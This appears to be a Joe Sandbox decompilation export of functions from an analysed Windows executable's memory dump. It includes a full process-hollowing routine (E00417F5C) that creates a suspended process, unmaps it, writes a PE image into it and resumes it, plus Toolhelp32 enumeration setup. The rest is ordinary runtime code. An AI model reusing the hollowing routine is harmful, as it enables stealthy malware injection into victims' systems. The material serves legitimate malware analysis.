    0x00403d9a
    0x00403da1
    0x00403da1
    0x00403d9a
    0x00403d8a
    0x00403da6
    0x00403daf
    0x00403db1
    0x00403db1
    0x00403db8
    0x00403dba
    0x00403dba
    0x00403dc2
    0x00403dcb
    0x00403dcd
    0x00403dcd
    0x00403dd6
    0x00403dd6
    0x00403de7
    0x00403de7
    0x00403de9
    0x00000000
    0x00403d3a
    0x00403d3a
    0x00403d40
    0x00403d44
    0x00403d46
    0x00000000
    0x00403d3a

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 00405824, Relevance: 1.5, APIs: 1, Instructions: 31
    C-Code - Quality: 100%
    			E00405824(intOrPtr* __eax, void* __edx) {
				char _v1032;
				int _t13;
				void* _t22;

				_t21 = __edx;
				if(__eax != 0) {
					if( *(__eax + 4) >= 0x10000) {
						return E00404080(__edx,  *(__eax + 4));
					}
					_t13 = LoadStringA(E00404DCC( *((intOrPtr*)( *__eax))),  *(__eax + 4),  &_v1032, 0x400); // executed
					return E00403F78(_t21, _t13, _t22);
				}
				return __eax;
			}






    0x0040582c
    0x00405832
    0x0040583b
    0x00000000
    0x0040586c
    0x00405855
    0x00000000
    0x00405860
    0x00405879

    APIs
    • LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 00404D84, Relevance: 1.5, APIs: 1, Instructions: 26
    C-Code - Quality: 100%
    			E00404D84(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					GetModuleFileNameA( *(__eax + 4),  &_v272, 0x105);
					_t14 = E00404FC0(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
					}
				}
				return  *((intOrPtr*)(_t16 + 0x10));
			}








    0x00404d8c
    0x00404d92
    0x00404da2
    0x00404dab
    0x00404db0
    0x00404db2
    0x00404db7
    0x00404dbc
    0x00404dbc
    0x00404db7
    0x00404dca

    APIs
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00404DA2
      • Part of subcall function 00404FC0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
      • Part of subcall function 00404FC0: RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
      • Part of subcall function 00404FC0: GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
      • Part of subcall function 00404FC0: GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
      • Part of subcall function 00404FC0: lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 00403B18, Relevance: .0, Instructions: 37
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 00402670, Relevance: .0, Instructions: 14
    C-Code - Quality: 37%
    			E00402670(void* __eax) {
				void* _t3;
				void* _t6;

				if(__eax <= 0) {
					_t6 = 0;
				} else {
					_t3 =  *0x41903c(); // executed
					_t6 = _t3;
					if(_t6 == 0) {
						E00402778(1);
					}
				}
				return _t6;
			}





    0x00402673
    0x0040268a
    0x00402675
    0x00402675
    0x0040267b
    0x0040267f
    0x00402683
    0x00402683
    0x0040267f
    0x0040268f

    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 00403B78, Relevance: .0, Instructions: 12
    C-Code - Quality: 100%
    			E00403B78(intOrPtr __eax, intOrPtr __edx) {
				void* _t6;
				intOrPtr _t7;

				_t7 = __edx;
				 *0x454014 = 0x4011a8;
				 *0x454018 = 0x4011b0;
				 *0x454638 = __eax;
				 *0x45463c = 0;
				 *0x454640 = __edx;
				_t1 = _t7 + 4; // 0x400000
				 *0x45402c =  *_t1;
				E00403A70();
				 *0x454034 = 0; // executed
				_t6 = E00403B18(); // executed
				return _t6;
			}





    0x00403b78
    0x00403b78
    0x00403b82
    0x00403b8c
    0x00403b93
    0x00403b98
    0x00403b9e
    0x00403ba1
    0x00403ba6
    0x00403bab
    0x00403bb2
    0x00403bb7

    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd

    Non-executed Functions

    Function 00417F5C, Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 236
    C-Code - Quality: 76%
    			E00417F5C(intOrPtr __eax, void* __ebx, short* __ecx, char __edx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				char _v12;
				CONTEXT* _v16;
				void* _v20;
				void _v24;
				void _v28;
				long _v32;
				struct _PROCESS_INFORMATION _v48;
				struct _STARTUPINFOA _v116;
				CHAR* _t95;
				short* _t171;
				intOrPtr _t182;
				intOrPtr _t189;
				intOrPtr* _t194;
				short* _t196;
				void* _t197;
				void* _t199;
				void* _t200;
				intOrPtr _t201;
				void* _t215;

				_t215 = __fp0;
				_t199 = _t200;
				_t201 = _t200 + 0xffffff90;
				_t196 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00404338(_v8);
				E00404338(_v12);
				_push(_t199);
				_push(0x418218);
				_push( *[fs:eax]);
				 *[fs:eax] = _t201;
				if(_v12 != 0) {
					_push(0x418230);
					_push(_v8);
					_push(0x41823c);
					_push(_v12);
					E00404208();
				}
				 *_a4 = 0;
				_t171 = _t196;
				if( *_t171 == 0x5a4d) {
					_t194 =  *((intOrPtr*)(_t171 + 0x3c)) + _t196;
					if( *_t194 == 0x4550) {
						E00402B60( &_v116, 0x44);
						E00402B60( &_v48, 0x10);
						_v116.cb = 0x44;
						_v116.dwFlags = 1;
						_v116.wShowWindow = 0;
						_t95 = E00404348(_v12);
						if(CreateProcessA(E00404348(_v8), _t95, 0, 0, 0, 4, 0, 0,  &_v116,  &_v48) != 0) {
							 *_a4 = _v48.dwProcessId;
							_v16 = E00417F28( &_v20);
							if(_v16 != 0) {
								_v16->ContextFlags = 0x10007;
								if(GetThreadContext(_v48.hThread, _v16) != 0) {
									ReadProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v24, 4,  &_v32);
									if( *(_t194 + 0x34) != _v24) {
										_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
									} else {
										if(NtUnmapViewOfSection(_v48.hProcess,  *(_t194 + 0x34)) != 0) {
											_v28 = VirtualAllocEx(_v48.hProcess, 0,  *(_t194 + 0x50), 0x3000, 0x40);
										} else {
											_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
										}
									}
									_t210 = _v28;
									if(_v28 != 0) {
										_t197 = E00417EA4(_t196, _t210);
										_t125 = _v28;
										if( *(_t194 + 0x34) != _v28) {
											E00417E10(_t215, _t197, _t194, _t125 -  *(_t194 + 0x34));
											 *(_t194 + 0x34) = _v28;
											E00405DE0( *((intOrPtr*)(_t171 + 0x3c)) + _t197, _t194);
										}
										WriteProcessMemory(_v48.hProcess, _v28, _t197,  *(_t194 + 0x50),  &_v32);
										WriteProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v28, 4,  &_v32);
										_v16->Eax =  *((intOrPtr*)(_t194 + 0x28)) + _v28;
										SetThreadContext(_v48.hThread, _v16);
										ResumeThread(_v48.hThread);
										WaitForSingleObject(_v48.hThread, 0xffffffff);
										_push(_t199);
										_push(0x4181d0);
										_push( *[fs:eax]);
										 *[fs:eax] = _t201;
										TerminateThread(_v48.hProcess, 0);
										CloseHandle(_v48.hProcess);
										_pop(_t189);
										 *[fs:eax] = _t189;
									}
								}
								VirtualFree(_v20, 0, 0x8000);
							}
							if( *_a4 == 0) {
								TerminateProcess(_v48, 0);
							}
						}
					}
				}
				_pop(_t182);
				 *[fs:eax] = _t182;
				_push(E0041821F);
				return E00403EAC( &_v12, 2);
			}























    0x00417f5c
    0x00417f5d
    0x00417f5f
    0x00417f65
    0x00417f67
    0x00417f6a
    0x00417f70
    0x00417f78
    0x00417f7f
    0x00417f80
    0x00417f85
    0x00417f88
    0x00417f8f
    0x00417f91
    0x00417f96
    0x00417f99
    0x00417f9e
    0x00417fa9
    0x00417fa9
    0x00417fb3
    0x00417fb5
    0x00417fbc
    0x00417fc5
    0x00417fcd
    0x00417fdd
    0x00417fec
    0x00417ff1
    0x00417ff8
    0x00417fff
    0x0041801c
    0x00418032
    0x0041803e
    0x00418048
    0x0041804f
    0x00418058
    0x0041806d
    0x0041808e
    0x00418099
    0x004180fc
    0x0041809b
    0x004180aa
    0x004180df
    0x004180ac
    0x004180c4
    0x004180c4
    0x004180aa
    0x004180ff
    0x00418103
    0x00418110
    0x00418115
    0x0041811a
    0x00418122
    0x0041812a
    0x00418139
    0x00418139
    0x0041814f
    0x0041816f
    0x0041817d
    0x0041818b
    0x00418194
    0x0041819f
    0x004181a6
    0x004181a7
    0x004181ac
    0x004181af
    0x004181b8
    0x004181c1
    0x004181c8
    0x004181cb
    0x004181cb
    0x00418103
    0x004181e5
    0x004181e5
    0x004181f0
    0x004181f8
    0x004181f8
    0x004181f0
    0x00418032
    0x00417fcd
    0x004181ff
    0x00418202
    0x00418205
    0x00418217

    APIs
    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F28: VirtualAlloc.KERNEL32(00000000,000000D0,00001000,00000004,?,00418048,00000000,00418218), ref: 00417F39
    • GetThreadContext.KERNEL32(?,00000000), ref: 00418066
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
    • NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
    • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
    • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
    • WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
    • SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
    • ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
    • TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
    • CloseHandle.KERNEL32(?), ref: 004181C1
    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
    • TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 00404E08, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136
    C-Code - Quality: 53%
    			E00404E08(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _WIN32_FIND_DATAA _v334;
				char _v595;
				void* _t45;
				char* _t54;
				char* _t64;
				void* _t83;
				intOrPtr* _t84;
				char* _t90;
				struct HINSTANCE__* _t91;
				char* _t93;
				void* _t94;
				char* _t95;
				void* _t96;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t91 = GetModuleHandleA("kernel32.dll");
				if(_t91 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t93 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_t95 = E00404DF4(_v8 + 2);
							if( *_t95 != 0) {
								_t14 = _t95 + 1; // 0x1
								_t93 = E00404DF4(_t14);
								if( *_t93 != 0) {
									L10:
									_t83 = _t93 - _v8;
									_push(_t83 + 1);
									_push(_v8);
									_push( &_v595);
									L00401248();
									while( *_t93 != 0) {
										_t90 = E00404DF4(_t93 + 1);
										_t45 = _t90 - _t93;
										if(_t45 + _t83 + 1 <= 0x105) {
											_push(_t45 + 1);
											_push(_t93);
											_push( &(( &_v595)[_t83]));
											L00401248();
											_t94 = FindFirstFileA( &_v595,  &_v334);
											if(_t94 != 0xffffffff) {
												FindClose(_t94);
												_t54 =  &(_v334.cFileName);
												_push(_t54);
												L00401250();
												if(_t54 + _t83 + 1 + 1 <= 0x105) {
													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
													_push(0x105 - _t83 - 1);
													_push( &(_v334.cFileName));
													_push( &(( &(( &_v595)[_t83]))[1]));
													L00401248();
													_t64 =  &(_v334.cFileName);
													_push(_t64);
													L00401250();
													_t83 = _t83 + _t64 + 1;
													_t93 = _t90;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v595);
									_push(_v8);
									L00401248();
								}
							}
						}
					}
				} else {
					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
					if(_t84 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v595);
						_push(_v8);
						if( *_t84() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v595);
							_push(_v8);
							L00401248();
						}
					}
				}
				L17:
				return _v16;
			}



















    0x00404e14
    0x00404e17
    0x00404e1d
    0x00404e2a
    0x00404e2e
    0x00404e70
    0x00404e76
    0x00404eb3
    0x00000000
    0x00404e78
    0x00404e7f
    0x00404e90
    0x00404e95
    0x00404e9b
    0x00404ea3
    0x00404ea8
    0x00404eb6
    0x00404eb8
    0x00404ebe
    0x00404ec2
    0x00404ec9
    0x00404eca
    0x00404f75
    0x00404edc
    0x00404ee0
    0x00404eed
    0x00404ef4
    0x00404ef5
    0x00404efe
    0x00404eff
    0x00404f17
    0x00404f1c
    0x00404f1f
    0x00404f24
    0x00404f2a
    0x00404f2b
    0x00404f3b
    0x00404f3d
    0x00404f4d
    0x00404f54
    0x00404f5e
    0x00404f5f
    0x00404f64
    0x00404f6a
    0x00404f6b
    0x00404f71
    0x00404f73
    0x00000000
    0x00404f73
    0x00404f3b
    0x00404f1c
    0x00000000
    0x00404eed
    0x00404f81
    0x00404f88
    0x00404f8c
    0x00404f8d
    0x00404f8d
    0x00404ea8
    0x00404e95
    0x00404e7f
    0x00404e30
    0x00404e3b
    0x00404e3f
    0x00000000
    0x00404e41
    0x00404e41
    0x00404e4c
    0x00404e50
    0x00404e55
    0x00000000
    0x00404e57
    0x00404e5a
    0x00404e61
    0x00404e65
    0x00404e66
    0x00404e66
    0x00404e55
    0x00404e3f
    0x00404f92
    0x00404f9b

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
    • GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
    • lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
    • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404DF4: CharNextA.USER32(?), ref: 00404DF7
    • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
    • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
    • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
    • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
    • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
    • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 0040B2B4, Relevance: 3.0, APIs: 2, Instructions: 37
    C-Code - Quality: 46%
    			E0040B2B4(int __eax, void* __ebx, void* __eflags) {
				char _v11;
				char _v16;
				intOrPtr _t28;
				void* _t31;
				void* _t33;

				_t33 = __eflags;
				_v16 = 0;
				_push(_t31);
				_push(0x40b318);
				_push( *[fs:edx]);
				 *[fs:edx] = _t31 + 0xfffffff4;
				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
				E004040F8( &_v16, 7,  &_v11);
				_push(_v16);
				E00407174(7, GetACP(), _t33);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E0040B31F);
				return E00403E88( &_v16);
			}








    0x0040b2b4
    0x0040b2bd
    0x0040b2c2
    0x0040b2c3
    0x0040b2c8
    0x0040b2cb
    0x0040b2da
    0x0040b2ea
    0x0040b2f2
    0x0040b2fb
    0x0040b304
    0x0040b307
    0x0040b30a
    0x0040b317

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040B318), ref: 0040B2DA
    • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040B318), ref: 0040B2F3
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 0040587A, Relevance: 1.5, APIs: 1, Instructions: 38
    C-Code - Quality: 51%
    			E0040587A(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x4058e2);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E004040F8( &_v20, 7,  &_v15);
				E00402B80(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E004058E9);
				return E00403E88( &_v20);
			}








    0x00405885
    0x0040588a
    0x0040588b
    0x00405890
    0x00405893
    0x004058a2
    0x004058b2
    0x004058bd
    0x004058c8
    0x004058c8
    0x004058ce
    0x004058d1
    0x004058d4
    0x004058e1

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 0040587C, Relevance: 1.5, APIs: 1, Instructions: 37
    C-Code - Quality: 51%
    			E0040587C(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x4058e2);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E004040F8( &_v20, 7,  &_v15);
				E00402B80(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E004058E9);
				return E00403E88( &_v20);
			}








    0x00405885
    0x0040588a
    0x0040588b
    0x00405890
    0x00405893
    0x004058a2
    0x004058b2
    0x004058bd
    0x004058c8
    0x004058c8
    0x004058ce
    0x004058d1
    0x004058d4
    0x004058e1

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 00409DB0, Relevance: 1.5, APIs: 1, Instructions: 29
    C-Code - Quality: 100%
    			E00409DB0(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
					return E00403EDC(_t10, _t18);
				}
				return E00403F78(_t10, _t5 - 1,  &_v260);
			}






    0x00409dbb
    0x00409dbd
    0x00409dd5
    0x00000000
    0x00409ded
    0x00000000

    APIs
    • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 00409DFC, Relevance: 1.5, APIs: 1, Instructions: 23
    C-Code - Quality: 79%
    			E00409DFC(int __eax, char __ecx, int __edx) {
				char _v16;
				char _t5;
				char _t6;

				_push(__ecx);
				_t6 = __ecx;
				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t6;
				} else {
					_t5 = _v16;
				}
				return _t5;
			}






    0x00409dff
    0x00409e00
    0x00409e16
    0x00409e1d
    0x00409e18
    0x00409e18
    0x00409e18
    0x00409e23

    APIs
    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 00417A70, Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99
    C-Code - Quality: 100%
    			E00417A70() {

				if( *0x454a18 == 0) {
					 *0x454a18 = GetModuleHandleA("kernel32.dll");
					if( *0x454a18 != 0) {
						 *0x454a1c = GetProcAddress( *0x454a18, "CreateToolhelp32Snapshot");
						 *0x454a20 = GetProcAddress( *0x454a18, "Heap32ListFirst");
						 *0x454a24 = GetProcAddress( *0x454a18, "Heap32ListNext");
						 *0x454a28 = GetProcAddress( *0x454a18, "Heap32First");
						 *0x454a2c = GetProcAddress( *0x454a18, "Heap32Next");
						 *0x454a30 = GetProcAddress( *0x454a18, "Toolhelp32ReadProcessMemory");
						 *0x454a34 = GetProcAddress( *0x454a18, "Process32First");
						 *0x454a38 = GetProcAddress( *0x454a18, "Process32Next");
						 *0x454a3c = GetProcAddress( *0x454a18, "Process32FirstW");
						 *0x454a40 = GetProcAddress( *0x454a18, "Process32NextW");
						 *0x454a44 = GetProcAddress( *0x454a18, "Thread32First");
						 *0x454a48 = GetProcAddress( *0x454a18, "Thread32Next");
						 *0x454a4c = GetProcAddress( *0x454a18, "Module32First");
						 *0x454a50 = GetProcAddress( *0x454a18, "Module32Next");
						 *0x454a54 = GetProcAddress( *0x454a18, "Module32FirstW");
						 *0x454a58 = GetProcAddress( *0x454a18, "Module32NextW");
					}
				}
				if( *0x454a18 == 0 ||  *0x454a1c == 0) {
					return 0;
				} else {
					return 1;
				}
			}



    0x00417a79
    0x00417a89
    0x00417a8e
    0x00417aa1
    0x00417ab3
    0x00417ac5
    0x00417ad7
    0x00417ae9
    0x00417afb
    0x00417b0d
    0x00417b1f
    0x00417b31
    0x00417b43
    0x00417b55
    0x00417b67
    0x00417b79
    0x00417b8b
    0x00417b9d
    0x00417baf
    0x00417baf
    0x00417a8e
